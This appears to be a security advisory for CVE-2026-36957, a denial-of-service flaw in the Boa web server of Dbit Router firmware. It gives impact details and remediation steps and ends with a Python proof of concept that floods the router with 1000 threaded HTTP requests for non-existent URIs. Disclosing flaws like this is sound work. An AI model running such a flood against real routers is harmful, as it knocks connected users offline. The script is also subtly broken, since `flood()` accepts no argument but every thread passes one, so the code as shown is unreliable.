# CVE-2026-36957: Boa Web Server Denial of Service Vulnerability ## Vulnerability Overview * **CVE ID**: CVE-2026-36957 * **Vulnerability Type**: Denial of Service (DoS) / CWE-400 (Uncontrolled Resource Consumption) * **CVSS Score**: 7.5 (High) * **Discoverer**: Kirubel Solomone * **Release Date**: 2026-04-29 * **Description**: A vulnerability exists in the URI handler of the Boa Web server within Dbit Router firmware V1.0.0. An attacker can exhaust critical system resources (including file descriptors and memory buffers) by sending a large number of HTTP GET requests targeting non-existent URIs, leading to kernel deadlock or system hang, thereby rendering the router management portal and all routing functions unavailable. ## Impact Scope * **Vendor**: Shenzhen Dibit Network Equipment Co., Ltd. * **Product**: Dbit Router * **Affected Version**: V1.0.0 * **Attack Vector**: Network * **Specific Impacts**: * Complete loss of web management interface * Routing functionality interruption * Manual reboot required to restore services * All connected devices face network disruption ## Remediation Measures 1. Implement connection rate limiting on the Boa Web server. 2. Add a watchdog timer to recover from deadlock states. 3. Limit the maximum concurrent connections per IP. ## Proof-of-Concept Code (POC) ```python import requests import threading TARGET = "http://192.168.10.1" def flood(): try: requests.get(f"{TARGET}/nonexistent_{i}", timeout=2) except: pass threads = [] for i in range(1000): t = threading.Thread(target=flood, args=(i,)) threads.append(t) t.start() for t in threads: t.join() print("Done. Check if router is still responsive.") ```